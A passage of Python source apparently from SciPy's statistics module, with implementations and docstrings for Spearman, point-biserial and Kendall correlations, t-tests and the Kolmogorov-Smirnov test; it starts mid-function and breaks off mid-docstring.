while guess > 0 and hypergeom.pmf(guess, n1 + n2, n1, n) < pexact * epsilon:
guess -= 1
while hypergeom.pmf(guess, n1 + n2, n1, n) > pexact / epsilon:
guess += 1
else:
while hypergeom.pmf(guess, n1 + n2, n1, n) < pexact * epsilon:
guess += 1
while guess > 0 and hypergeom.pmf(guess, n1 + n2, n1, n) > pexact / epsilon:
guess -= 1
return guess
if alternative == 'less':
pvalue = hypergeom.cdf(c[0,0], n1 + n2, n1, n)
elif alternative == 'greater':
# Same formula as the 'less' case, but with the second column.
pvalue = hypergeom.cdf(c[0,1], n1 + n2, n1, c[0,1] + c[1,1])
elif alternative == 'two-sided':
mode = int(float((n + 1) * (n1 + 1)) / (n1 + n2 + 2))
pexact = hypergeom.pmf(c[0,0], n1 + n2, n1, n)
pmode = hypergeom.pmf(mode, n1 + n2, n1, n)
epsilon = 1 - 1e-4
if np.abs(pexact - pmode) / np.maximum(pexact, pmode) <= 1 - epsilon:
return oddsratio, 1.
elif c[0,0] < mode:
plower = hypergeom.cdf(c[0,0], n1 + n2, n1, n)
if hypergeom.pmf(n, n1 + n2, n1, n) > pexact / epsilon:
return oddsratio, plower
guess = binary_search(n, n1, n2, "upper")
pvalue = plower + hypergeom.sf(guess - 1, n1 + n2, n1, n)
else:
pupper = hypergeom.sf(c[0,0] - 1, n1 + n2, n1, n)
if hypergeom.pmf(0, n1 + n2, n1, n) > pexact / epsilon:
return oddsratio, pupper
guess = binary_search(n, n1, n2, "lower")
pvalue = pupper + hypergeom.cdf(guess, n1 + n2, n1, n)
else:
msg = "`alternative` should be one of {'two-sided', 'less', 'greater'}"
raise ValueError(msg)
if pvalue > 1.0:
pvalue = 1.0
return oddsratio, pvalue
def spearmanr(a, b=None, axis=0, nan_policy='propagate'):
"""
Calculates a Spearman rank-order correlation coefficient and the p-value
to test for non-correlation.
The Spearman correlation is a nonparametric measure of the monotonicity
of the relationship between two datasets. Unlike the Pearson correlation,
the Spearman correlation does not assume that both datasets are normally
distributed. Like other correlation coefficients, this one varies
between -1 and +1 with 0 implying no correlation. Correlations of -1 or
+1 imply an exact monotonic relationship. Positive correlations imply that
as x increases, so does y. Negative correlations imply that as x
increases, y decreases.
The p-value roughly indicates the probability of an uncorrelated system
producing datasets that have a Spearman correlation at least as extreme
as the one computed from these datasets. The p-values are not entirely
reliable but are probably reasonable for datasets larger than 500 or so.
Parameters
----------
a, b : 1D or 2D array_like, b is optional
One or two 1-D or 2-D arrays containing multiple variables and
observations. When these are 1-D, each represents a vector of
observations of a single variable. For the behavior in the 2-D case,
see under ``axis``, below.
Both arrays need to have the same length in the ``axis`` dimension.
axis : int or None, optional
If axis=0 (default), then each column represents a variable, with
observations in the rows. If axis=1, the relationship is transposed:
each row represents a variable, while the columns contain observations.
If axis=None, then both arrays will be raveled.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
correlation : float or ndarray (2-D square)
Spearman correlation matrix or correlation coefficient (if only 2
variables are given as parameters. Correlation matrix is square with
length equal to total number of variables (columns or rows) in a and b
combined.
pvalue : float
The two-sided p-value for a hypothesis test whose null hypothesis is
that two sets of data are uncorrelated, has same dimension as rho.
Notes
-----
Changes in scipy 0.8.0: rewrite to add tie-handling, and axis.
References
----------
.. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
Section 14.7
Examples
--------
>>> from scipy import stats
>>> stats.spearmanr([1,2,3,4,5], [5,6,7,8,7])
(0.82078268166812329, 0.088587005313543798)
>>> np.random.seed(1234321)
>>> x2n = np.random.randn(100, 2)
>>> y2n = np.random.randn(100, 2)
>>> stats.spearmanr(x2n)
(0.059969996999699973, 0.55338590803773591)
>>> stats.spearmanr(x2n[:,0], x2n[:,1])
(0.059969996999699973, 0.55338590803773591)
>>> rho, pval = stats.spearmanr(x2n, y2n)
>>> rho
array([[ 1. , 0.05997 , 0.18569457, 0.06258626],
[ 0.05997 , 1. , 0.110003 , 0.02534653],
[ 0.18569457, 0.110003 , 1. , 0.03488749],
[ 0.06258626, 0.02534653, 0.03488749, 1. ]])
>>> pval
array([[ 0. , 0.55338591, 0.06435364, 0.53617935],
[ 0.55338591, 0. , 0.27592895, 0.80234077],
[ 0.06435364, 0.27592895, 0. , 0.73039992],
[ 0.53617935, 0.80234077, 0.73039992, 0. ]])
>>> rho, pval = stats.spearmanr(x2n.T, y2n.T, axis=1)
>>> rho
array([[ 1. , 0.05997 , 0.18569457, 0.06258626],
[ 0.05997 , 1. , 0.110003 , 0.02534653],
[ 0.18569457, 0.110003 , 1. , 0.03488749],
[ 0.06258626, 0.02534653, 0.03488749, 1. ]])
>>> stats.spearmanr(x2n, y2n, axis=None)
(0.10816770419260482, 0.1273562188027364)
>>> stats.spearmanr(x2n.ravel(), y2n.ravel())
(0.10816770419260482, 0.1273562188027364)
>>> xint = np.random.randint(10, size=(100, 2))
>>> stats.spearmanr(xint)
(0.052760927029710199, 0.60213045837062351)
"""
a, axisout = _chk_asarray(a, axis)
SpearmanrResult = namedtuple('SpearmanrResult', ('correlation', 'pvalue'))
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
b = ma.masked_invalid(b)
return mstats_basic.spearmanr(a, b, axis)
if contains_nan and nan_policy == 'propagate':
return SpearmanrResult(np.nan, np.nan)
if a.size <= 1:
return SpearmanrResult(np.nan, np.nan)
ar = np.apply_along_axis(rankdata, axisout, a)
br = None
if b is not None:
b, axisout = _chk_asarray(b, axis)
contains_nan, nan_policy = _contains_nan(b, nan_policy)
if contains_nan and nan_policy == 'omit':
b = ma.masked_invalid(b)
return mstats_basic.spearmanr(a, b, axis)
if contains_nan and nan_policy == 'propagate':
return SpearmanrResult(np.nan, np.nan)
br = np.apply_along_axis(rankdata, axisout, b)
n = a.shape[axisout]
rs = np.corrcoef(ar, br, rowvar=axisout)
olderr = np.seterr(divide='ignore') # rs can have elements equal to 1
try:
t = rs * np.sqrt((n-2) / ((rs+1.0)*(1.0-rs)))
finally:
np.seterr(**olderr)
prob = 2 * distributions.t.sf(np.abs(t), n-2)
if rs.shape == (2, 2):
return SpearmanrResult(rs[1, 0], prob[1, 0])
else:
return SpearmanrResult(rs, prob)
def pointbiserialr(x, y):
"""
Calculates a point biserial correlation coefficient and its p-value.
The point biserial correlation is used to measure the relationship
between a binary variable, x, and a continuous variable, y. Like other
correlation coefficients, this one varies between -1 and +1 with 0
implying no correlation. Correlations of -1 or +1 imply a determinative
relationship.
This function uses a shortcut formula but produces the same result as
`pearsonr`.
Parameters
----------
x : array_like of bools
Input array.
y : array_like
Input array.
Returns
-------
correlation : float
R value
pvalue : float
2-tailed p-value
Notes
-----
`pointbiserialr` uses a t-test with ``n-1`` degrees of freedom.
It is equivalent to `pearsonr.`
The value of the point-biserial correlation can be calculated from:
.. math::
r_{pb} = \frac{\overline{Y_{1}} -
\overline{Y_{0}}}{s_{y}}\sqrt{\frac{N_{1} N_{2}}{N (N - 1))}}
Where :math:`Y_{0}` and :math:`Y_{1}` are means of the metric
observations coded 0 and 1 respectively; :math:`N_{0}` and :math:`N_{1}`
are number of observations coded 0 and 1 respectively; :math:`N` is the
total number of observations and :math:`s_{y}` is the standard
deviation of all the metric observations.
A value of :math:`r_{pb}` that is significantly different from zero is
completely equivalent to a significant difference in means between the two
groups. Thus, an independent groups t Test with :math:`N-2` degrees of
freedom may be used to test whether :math:`r_{pb}` is nonzero. The
relation between the t-statistic for comparing two independent groups and
:math:`r_{pb}` is given by:
.. math::
t = \sqrt{N - 2}\frac{r_{pb}}{\sqrt{1 - r^{2}_{pb}}}
References
----------
.. [1] J. Lev, "The Point Biserial Coefficient of Correlation", Ann. Math.
Statist., Vol. 20, no.1, pp. 125-126, 1949.
.. [2] R.F. Tate, "Correlation Between a Discrete and a Continuous
Variable. Point-Biserial Correlation.", Ann. Math. Statist., Vol. 25,
np. 3, pp. 603-607, 1954.
.. [3] http://onlinelibrary.wiley.com/doi/10.1002/9781118445112.stat06227/full
Examples
--------
>>> from scipy import stats
>>> a = np.array([0, 0, 0, 1, 1, 1, 1])
>>> b = np.arange(7)
>>> stats.pointbiserialr(a, b)
(0.8660254037844386, 0.011724811003954652)
>>> stats.pearsonr(a, b)
(0.86602540378443871, 0.011724811003954626)
>>> np.corrcoef(a, b)
array([[ 1. , 0.8660254],
[ 0.8660254, 1. ]])
"""
PointbiserialrResult = namedtuple('PointbiserialrResult', ('correlation',
'pvalue'))
rpb, prob = pearsonr(x, y)
return PointbiserialrResult(rpb, prob)
def kendalltau(x, y, initial_lexsort=True, nan_policy='propagate'):
"""
Calculates Kendall's tau, a correlation measure for ordinal data.
Kendall's tau is a measure of the correspondence between two rankings.
Values close to 1 indicate strong agreement, values close to -1 indicate
strong disagreement. This is the tau-b version of Kendall's tau which
accounts for ties.
Parameters
----------
x, y : array_like
Arrays of rankings, of the same shape. If arrays are not 1-D, they will
be flattened to 1-D.
initial_lexsort : bool, optional
Whether to use lexsort or quicksort as the sorting method for the
initial sort of the inputs. Default is lexsort (True), for which
`kendalltau` is of complexity O(n log(n)). If False, the complexity is
O(n^2), but with a smaller pre-factor (so quicksort may be faster for
small arrays).
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
correlation : float
The tau statistic.
pvalue : float
The two-sided p-value for a hypothesis test whose null hypothesis is
an absence of association, tau = 0.
See also
--------
spearmanr : Calculates a Spearman rank-order correlation coefficient.
theilslopes : Computes the Theil-Sen estimator for a set of points (x, y).
Notes
-----
The definition of Kendall's tau that is used is::
tau = (P - Q) / sqrt((P + Q + T) * (P + Q + U))
where P is the number of concordant pairs, Q the number of discordant
pairs, T the number of ties only in `x`, and U the number of ties only in
`y`. If a tie occurs for the same pair in both `x` and `y`, it is not
added to either T or U.
References
----------
W.R. Knight, "A Computer Method for Calculating Kendall's Tau with
Ungrouped Data", Journal of the American Statistical Association, Vol. 61,
No. 314, Part 1, pp. 436-439, 1966.
Examples
--------
>>> from scipy import stats
>>> x1 = [12, 2, 1, 12, 2]
>>> x2 = [1, 4, 7, 1, 0]
>>> tau, p_value = stats.kendalltau(x1, x2)
>>> tau
-0.47140452079103173
>>> p_value
0.24821309157521476
"""
x = np.asarray(x).ravel()
y = np.asarray(y).ravel()
KendalltauResult = namedtuple('KendalltauResult', ('correlation', 'pvalue'))
if x.size != y.size:
raise ValueError("All inputs to `kendalltau` must be of the same size, "
"found x-size %s and y-size %s" % (x.size, y.size))
elif not x.size or not y.size:
return KendalltauResult(np.nan, np.nan) # Return NaN if arrays are empty
# check both x and y
contains_nan, nan_policy = (_contains_nan(x, nan_policy) or
_contains_nan(y, nan_policy))
if contains_nan and nan_policy == 'propagate':
return KendalltauResult(np.nan, np.nan)
elif contains_nan and nan_policy == 'omit':
x = ma.masked_invalid(x)
y = ma.masked_invalid(y)
return mstats_basic.kendalltau(x, y)
n = np.int64(len(x))
temp = list(range(n)) # support structure used by mergesort
# this closure recursively sorts sections of perm[] by comparing
# elements of y[perm[]] using temp[] as support
# returns the number of swaps required by an equivalent bubble sort
def mergesort(offs, length):
exchcnt = 0
if length == 1:
return 0
if length == 2:
if y[perm[offs]] <= y[perm[offs+1]]:
return 0
t = perm[offs]
perm[offs] = perm[offs+1]
perm[offs+1] = t
return 1
length0 = length // 2
length1 = length - length0
middle = offs + length0
exchcnt += mergesort(offs, length0)
exchcnt += mergesort(middle, length1)
if y[perm[middle - 1]] < y[perm[middle]]:
return exchcnt
# merging
i = j = k = 0
while j < length0 or k < length1:
if k >= length1 or (j < length0 and y[perm[offs + j]] <=
y[perm[middle + k]]):
temp[i] = perm[offs + j]
d = i - j
j += 1
else:
temp[i] = perm[middle + k]
d = (offs + i) - (middle + k)
k += 1
if d > 0:
exchcnt += d
i += 1
perm[offs:offs+length] = temp[0:length]
return exchcnt
# initial sort on values of x and, if tied, on values of y
if initial_lexsort:
# sort implemented as mergesort, worst case: O(n log(n))
perm = np.lexsort((y, x))
else:
# sort implemented as quicksort, 30% faster but with worst case: O(n^2)
perm = list(range(n))
perm.sort(key=lambda a: (x[a], y[a]))
# compute joint ties
first = 0
t = 0
for i in xrange(1, n):
if x[perm[first]] != x[perm[i]] or y[perm[first]] != y[perm[i]]:
t += ((i - first) * (i - first - 1)) // 2
first = i
t += ((n - first) * (n - first - 1)) // 2
# compute ties in x
first = 0
u = 0
for i in xrange(1, n):
if x[perm[first]] != x[perm[i]]:
u += ((i - first) * (i - first - 1)) // 2
first = i
u += ((n - first) * (n - first - 1)) // 2
# count exchanges
exchanges = mergesort(0, n)
# compute ties in y after mergesort with counting
first = 0
v = 0
for i in xrange(1, n):
if y[perm[first]] != y[perm[i]]:
v += ((i - first) * (i - first - 1)) // 2
first = i
v += ((n - first) * (n - first - 1)) // 2
tot = (n * (n - 1)) // 2
if tot == u or tot == v:
# Special case for all ties in both ranks
return KendalltauResult(np.nan, np.nan)
# Prevent overflow; equal to np.sqrt((tot - u) * (tot - v))
denom = np.exp(0.5 * (np.log(tot - u) + np.log(tot - v)))
tau = ((tot - (v + u - t)) - 2.0 * exchanges) / denom
# what follows reproduces the ending of Gary Strangman's original
# stats.kendalltau() in SciPy
svar = (4.0 * n + 10.0) / (9.0 * n * (n - 1))
z = tau / np.sqrt(svar)
prob = special.erfc(np.abs(z) / 1.4142136)
return KendalltauResult(tau, prob)
#####################################
# INFERENTIAL STATISTICS #
#####################################
def ttest_1samp(a, popmean, axis=0, nan_policy='propagate'):
"""
Calculates the T-test for the mean of ONE group of scores.
This is a two-sided test for the null hypothesis that the expected value
(mean) of a sample of independent observations `a` is equal to the given
population mean, `popmean`.
Parameters
----------
a : array_like
sample observation
popmean : float or array_like
expected value in null hypothesis, if array_like than it must have the
same shape as `a` excluding the axis dimension
axis : int or None, optional
Axis along which to compute test. If None, compute over the whole
array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
statistic : float or array
t-statistic
pvalue : float or array
two-tailed p-value
Examples
--------
>>> from scipy import stats
>>> np.random.seed(7654567) # fix seed to get the same result
>>> rvs = stats.norm.rvs(loc=5, scale=10, size=(50,2))
Test if mean of random sample is equal to true mean, and different mean.
We reject the null hypothesis in the second case and don't reject it in
the first case.
>>> stats.ttest_1samp(rvs,5.0)
(array([-0.68014479, -0.04323899]), array([ 0.49961383, 0.96568674]))
>>> stats.ttest_1samp(rvs,0.0)
(array([ 2.77025808, 4.11038784]), array([ 0.00789095, 0.00014999]))
Examples using axis and non-scalar dimension for population mean.
>>> stats.ttest_1samp(rvs,[5.0,0.0])
(array([-0.68014479, 4.11038784]), array([ 4.99613833e-01, 1.49986458e-04]))
>>> stats.ttest_1samp(rvs.T,[5.0,0.0],axis=1)
(array([-0.68014479, 4.11038784]), array([ 4.99613833e-01, 1.49986458e-04]))
>>> stats.ttest_1samp(rvs,[[5.0],[0.0]])
(array([[-0.68014479, -0.04323899],
[ 2.77025808, 4.11038784]]), array([[ 4.99613833e-01, 9.65686743e-01],
[ 7.89094663e-03, 1.49986458e-04]]))
"""
a, axis = _chk_asarray(a, axis)
Ttest_1sampResult = namedtuple('Ttest_1sampResult', ('statistic', 'pvalue'))
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.ttest_1samp(a, popmean, axis)
n = a.shape[axis]
df = n - 1
d = np.mean(a, axis) - popmean
v = np.var(a, axis, ddof=1)
denom = np.sqrt(v / float(n))
t = np.divide(d, denom)
t, prob = _ttest_finish(df, t)
return Ttest_1sampResult(t, prob)
def _ttest_finish(df, t):
"""Common code between all 3 t-test functions."""
prob = distributions.t.sf(np.abs(t), df) * 2 # use np.abs to get upper tail
if t.ndim == 0:
t = t[()]
return t, prob
def _ttest_ind_from_stats(mean1, mean2, denom, df):
d = mean1 - mean2
t = np.divide(d, denom)
t, prob = _ttest_finish(df, t)
return (t, prob)
def _unequal_var_ttest_denom(v1, n1, v2, n2):
vn1 = v1 / n1
vn2 = v2 / n2
df = ((vn1 + vn2)**2) / ((vn1**2) / (n1 - 1) + (vn2**2) / (n2 - 1))
# If df is undefined, variances are zero (assumes n1 > 0 & n2 > 0).
# Hence it doesn't matter what df is as long as it's not NaN.
df = np.where(np.isnan(df), 1, df)
denom = np.sqrt(vn1 + vn2)
return df, denom
def _equal_var_ttest_denom(v1, n1, v2, n2):
df = n1 + n2 - 2
svar = ((n1 - 1) * v1 + (n2 - 1) * v2) / float(df)
denom = np.sqrt(svar * (1.0 / n1 + 1.0 / n2))
return df, denom
def ttest_ind_from_stats(mean1, std1, nobs1, mean2, std2, nobs2,
equal_var=True):
"""
T-test for means of two independent samples from descriptive statistics.
This is a two-sided test for the null hypothesis that 2 independent samples
have identical average (expected) values.
Parameters
----------
mean1 : array_like
The mean(s) of sample 1.
std1 : array_like
The standard deviation(s) of sample 1.
nobs1 : array_like
The number(s) of observations of sample 1.
mean2 : array_like
The mean(s) of sample 2
std2 : array_like
The standard deviations(s) of sample 2.
nobs2 : array_like
The number(s) of observations of sample 2.
equal_var : bool, optional
If True (default), perform a standard independent 2 sample test
that assumes equal population variances [1]_.
If False, perform Welch's t-test, which does not assume equal
population variance [2]_.
Returns
-------
statistic : float or array
The calculated t-statistics
pvalue : float or array
The two-tailed p-value.
See also
--------
scipy.stats.ttest_ind
Notes
-----
.. versionadded:: 0.16.0
References
----------
.. [1] http://en.wikipedia.org/wiki/T-test#Independent_two-sample_t-test
.. [2] http://en.wikipedia.org/wiki/Welch%27s_t_test
"""
if equal_var:
df, denom = _equal_var_ttest_denom(std1**2, nobs1, std2**2, nobs2)
else:
df, denom = _unequal_var_ttest_denom(std1**2, nobs1,
std2**2, nobs2)
Ttest_indResult = namedtuple('Ttest_indResult', ('statistic', 'pvalue'))
res = _ttest_ind_from_stats(mean1, mean2, denom, df)
return Ttest_indResult(*res)
def ttest_ind(a, b, axis=0, equal_var=True, nan_policy='propagate'):
"""
Calculates the T-test for the means of TWO INDEPENDENT samples of scores.
This is a two-sided test for the null hypothesis that 2 independent samples
have identical average (expected) values. This test assumes that the
populations have identical variances by default.
Parameters
----------
a, b : array_like
The arrays must have the same shape, except in the dimension
corresponding to `axis` (the first, by default).
axis : int or None, optional
Axis along which to compute test. If None, compute over the whole
arrays, `a`, and `b`.
equal_var : bool, optional
If True (default), perform a standard independent 2 sample test
that assumes equal population variances [1]_.
If False, perform Welch's t-test, which does not assume equal
population variance [2]_.
.. versionadded:: 0.11.0
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
statistic : float or array
The calculated t-statistic.
pvalue : float or array
The two-tailed p-value.
Notes
-----
We can use this test, if we observe two independent samples from
the same or different population, e.g. exam scores of boys and
girls or of two ethnic groups. The test measures whether the
average (expected) value differs significantly across samples. If
we observe a large p-value, for example larger than 0.05 or 0.1,
then we cannot reject the null hypothesis of identical average scores.
If the p-value is smaller than the threshold, e.g. 1%, 5% or 10%,
then we reject the null hypothesis of equal averages.
References
----------
.. [1] http://en.wikipedia.org/wiki/T-test#Independent_two-sample_t-test
.. [2] http://en.wikipedia.org/wiki/Welch%27s_t_test
Examples
--------
>>> from scipy import stats
>>> np.random.seed(12345678)
Test with sample with identical means:
>>> rvs1 = stats.norm.rvs(loc=5,scale=10,size=500)
>>> rvs2 = stats.norm.rvs(loc=5,scale=10,size=500)
>>> stats.ttest_ind(rvs1,rvs2)
(0.26833823296239279, 0.78849443369564776)
>>> stats.ttest_ind(rvs1,rvs2, equal_var = False)
(0.26833823296239279, 0.78849452749500748)
`ttest_ind` underestimates p for unequal variances:
>>> rvs3 = stats.norm.rvs(loc=5, scale=20, size=500)
>>> stats.ttest_ind(rvs1, rvs3)
(-0.46580283298287162, 0.64145827413436174)
>>> stats.ttest_ind(rvs1, rvs3, equal_var = False)
(-0.46580283298287162, 0.64149646246569292)
When n1 != n2, the equal variance t-statistic is no longer equal to the
unequal variance t-statistic:
>>> rvs4 = stats.norm.rvs(loc=5, scale=20, size=100)
>>> stats.ttest_ind(rvs1, rvs4)
(-0.99882539442782481, 0.3182832709103896)
>>> stats.ttest_ind(rvs1, rvs4, equal_var = False)
(-0.69712570584654099, 0.48716927725402048)
T-test with different means, variance, and n:
>>> rvs5 = stats.norm.rvs(loc=8, scale=20, size=100)
>>> stats.ttest_ind(rvs1, rvs5)
(-1.4679669854490653, 0.14263895620529152)
>>> stats.ttest_ind(rvs1, rvs5, equal_var = False)
(-0.94365973617132992, 0.34744170334794122)
"""
a, b, axis = _chk2_asarray(a, b, axis)
Ttest_indResult = namedtuple('Ttest_indResult', ('statistic', 'pvalue'))
# check both a and b
contains_nan, nan_policy = (_contains_nan(a, nan_policy) or
_contains_nan(b, nan_policy))
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
b = ma.masked_invalid(b)
return mstats_basic.ttest_ind(a, b, axis, equal_var)
if a.size == 0 or b.size == 0:
return Ttest_indResult(np.nan, np.nan)
v1 = np.var(a, axis, ddof=1)
v2 = np.var(b, axis, ddof=1)
n1 = a.shape[axis]
n2 = b.shape[axis]
if equal_var:
df, denom = _equal_var_ttest_denom(v1, n1, v2, n2)
else:
df, denom = _unequal_var_ttest_denom(v1, n1, v2, n2)
res = _ttest_ind_from_stats(np.mean(a, axis), np.mean(b, axis), denom, df)
return Ttest_indResult(*res)
def ttest_rel(a, b, axis=0, nan_policy='propagate'):
"""
Calculates the T-test on TWO RELATED samples of scores, a and b.
This is a two-sided test for the null hypothesis that 2 related or
repeated samples have identical average (expected) values.
Parameters
----------
a, b : array_like
The arrays must have the same shape.
axis : int or None, optional
Axis along which to compute test. If None, compute over the whole
arrays, `a`, and `b`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
statistic : float or array
t-statistic
pvalue : float or array
two-tailed p-value
Notes
-----
Examples for the use are scores of the same set of student in
different exams, or repeated sampling from the same units. The
test measures whether the average score differs significantly
across samples (e.g. exams). If we observe a large p-value, for
example greater than 0.05 or 0.1 then we cannot reject the null
hypothesis of identical average scores. If the p-value is smaller
than the threshold, e.g. 1%, 5% or 10%, then we reject the null
hypothesis of equal averages. Small p-values are associated with
large t-statistics.
References
----------
http://en.wikipedia.org/wiki/T-test#Dependent_t-test
Examples
--------
>>> from scipy import stats
>>> np.random.seed(12345678) # fix random seed to get same numbers
>>> rvs1 = stats.norm.rvs(loc=5,scale=10,size=500)
>>> rvs2 = (stats.norm.rvs(loc=5,scale=10,size=500) +
... stats.norm.rvs(scale=0.2,size=500))
>>> stats.ttest_rel(rvs1,rvs2)
(0.24101764965300962, 0.80964043445811562)
>>> rvs3 = (stats.norm.rvs(loc=8,scale=10,size=500) +
... stats.norm.rvs(scale=0.2,size=500))
>>> stats.ttest_rel(rvs1,rvs3)
(-3.9995108708727933, 7.3082402191726459e-005)
"""
a, b, axis = _chk2_asarray(a, b, axis)
Ttest_relResult = namedtuple('Ttest_relResult', ('statistic', 'pvalue'))
# check both a and b
contains_nan, nan_policy = (_contains_nan(a, nan_policy) or
_contains_nan(b, nan_policy))
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.ttest_rel(a, b, axis)
if a.shape[axis] != b.shape[axis]:
raise ValueError('unequal length arrays')
if a.size == 0 or b.size == 0:
return np.nan, np.nan
n = a.shape[axis]
df = float(n - 1)
d = (a - b).astype(np.float64)
v = np.var(d, axis, ddof=1)
dm = np.mean(d, axis)
denom = np.sqrt(v / float(n))
t = np.divide(dm, denom)
t, prob = _ttest_finish(df, t)
return Ttest_relResult(t, prob)
def kstest(rvs, cdf, args=(), N=20, alternative='two-sided', mode='approx'):
"""
Perform the Kolmogorov-Smirnov test for goodness of fit.
This performs a test of the distribution G(x) of an observed
random variable against a given distribution F(x). Under the null
hypothesis the two distributions are identical, G(x)=F(x). The
alternative hypothesis can be either 'two-sided' (default), 'less'
or 'greater'. The KS test is only valid for continuous distributions.
Parameters
----------
rvs : str, array or callable
If a string, it should be the name of a distribution in `scipy.stats`.
If an array, it should be a 1-D array of observations of random
variables.
If a callable, it should be a function to generate random variables;
it is required to have a keyword argument `size`.
cdf : str or callable
If a string, it should be the name of a distribution in `scipy.stats`.
If `rvs` is a string then `cdf` can be False or the same as `rvs`.
If a callable, that callable is used to calculate the cdf.
args : tuple, sequence, optional
Distribution parameters, used if `rvs` or `cdf` are strings.
N : int, optional
Sample size if `rvs` is string or callable. Default is 20.
alternative : {'two-sided', 'less','greater'}, optional
Defines the alternative hypothesis (see explanation above).
Default is 'two-sided'.
mode : 'approx' (default) or 'asymp', optional
Defines the distribution used for calculating the p-value.
- 'approx' : use approximation to exact distribution of test statistic
- 'asymp' : use asymptotic distribution of test statistic
Returns
-------
statistic : float
KS test statistic, either D, D+ or D-.
pvalue : float
One-tailed or two-tailed p-value.
Notes
-----
In the one-sided test, the alternative is that the empirical
cumulative distribution function of the random variable is "less"
or "greater" than the cumulative distribution function F(x) of the
hypothesis, ``G(x)<=F(x)``, resp. ``G(x)>=F(x)``.
Examples
--------
>>> from scipy import stats
>>> x = np.linspace(-15, 15, 9)
>>> stats.kstest(x, 'norm')
(0.44435602715924361, 0.038850142705171065)
>>> np.random.seed(987654321) # set random seed to get the same result
>>> stats.kstest('norm', False, N=100)
(0.058352892479417884, 0.88531190944151261)
The above lines are equivalent to:
>>> np.random.seed(987654321)
>>> stats.kstest(stats.norm.rvs(size=100), 'norm')
(0.058352892479417884, 0.88531190944151261)
*Test against one-sided alternative hypothesis*
Shift distribution to larger values, so that ``cdf_dgp(x) < norm.cdf(x)``:
>>> np.random.seed(987654321)
>>> x = stats.norm.rvs(loc=0.2, size=100)
>>> stats.kstest(x,'norm', alternative = 'less')
(0.12464329735846891, 0.040989164077641749)
Reject equal distribution against alternative hypothesis: less
>>> stats.kstest(x,'norm', alternative = 'greater')
(0.0072115233216311081, 0.98531158590396395)
Don't reject equal distribution against alternative hypothesis: greater
>>> stats.kstest(x,'norm', mode='asymp')
(0.12464329735846891, 0.08944488871182088)
*Testing t distributed random variables against normal distribution*
With 100 degrees of freedom the t distribution looks close to the normal
distribution, and the K-S test does not reject the hypothesis that the
sample came from the normal distribution:
>>> np.random.seed(987654321)
>>> stats.kstest(stats.t.rvs(100,size=100),'norm')
(0.072018929165471257, 0.67630062862479168)
With 3 degrees of freedom the t distribution looks sufficiently different
from the normal distribution, that we can reject the hypothesis that the
sample came from the normal distribution at the 10% level:
>>> np.random.seed(987654321)
>>> stats.kstest(stats.t.rvs(3,size=100),'norm')
(0.131016895759829, 0.058826222555312224)
"""
if isinstance(rvs, string_types):
if (not cdf) or (cdf == rvs):
cdf = getattr(distributions, rvs).cdf
rvs = getattr(distributions, rvs).rvs
else:
raise AttributeError("if rvs is string, cdf has to be the "
"same distribution")
if isinstance(cdf, string_types):
cdf = getattr(distributions, cdf).cdf
if callable(rvs):
kwds = {'size': N}
vals = np.sort(rvs(*args, **kwds))
else:
vals = np.sort(rvs)
N = len(vals)
cdfvals = cdf(vals, *args)
# to not break compatibility with existing code
if alternative == 'two_sided':
alternative = 'two-sided'
KstestResult = namedtuple('KstestResult', ('statistic', 'pvalue'))
if alternative in ['two-sided', 'greater']:
Dplus = (np.arange(1.0, N + 1)/N - cdfvals).max()
if alternative == 'greater':
return KstestResult(Dplus, distributions.ksone.sf(Dplus, N))
if alternative in ['two-sided', 'less']:
Dmin = (cdfvals - np.arange(0.0, N)/N).max()
if alternative == 'less':
return KstestResult(Dmin, distributions.ksone.sf(Dmin, N))
if alternative == 'two-sided':
D = np.max([Dplus, Dmin])
if mode == 'asymp':
return KstestResult(D, distributions.kstwobign.sf(D * np.sqrt(N)))
if mode == 'approx':
pval_two = distributions.kstwobign.sf(D * np.sqrt(N))
if N > 2666 or pval_two > 0.80 - N*0.3/1000:
return KstestResult(D,
distributions.kstwobign.sf(D * np.sqrt(N)))
else:
return KstestResult(D, 2 * distributions.ksone.sf(D, N))
# Map from names to lambda_ values used in power_divergence().
_power_div_lambda_names = {
"pearson": 1,
"log-likelihood": 0,
"freeman-tukey": -0.5,
"mod-log-likelihood": -1,
"neyman": -2,
"cressie-read": 2/3,
}
def _count(a, axis=None):
"""
Count the number of non-masked elements of an array.
This function behaves like np.ma.count(), but is much faster
for ndarrays.
"""
if hasattr(a, 'count'):
num = a.count(axis=axis)
if isinstance(num, np.ndarray) and num.ndim == 0:
# In some cases, the `count` method returns a scalar array (e.g.
# np.array(3)), but we want a plain integer.
num = int(num)
else:
if axis is None:
num = a.size
else:
num = a.shape[axis]
return num
def power_divergence(f_obs, f_exp=None, ddof=0, axis=0, lambda_=None):
"""
Cressie-Read power divergence statistic and goodness of fit test.
This function tests the null hypothesis that the categorical data
has the given frequencies, using the Cressie-Read power divergence
statistic.
Parameters
----------
f_obs : array_like
Observed frequencies in each category.
f_exp : array_like, optional
Expected frequencies in each category. By default the categories are
assumed to be equally likely.
ddof : int, optional
"Delta degrees of freedom": adjustment to the degrees of freedom
for the p-value. The p-value is computed using a chi-squared
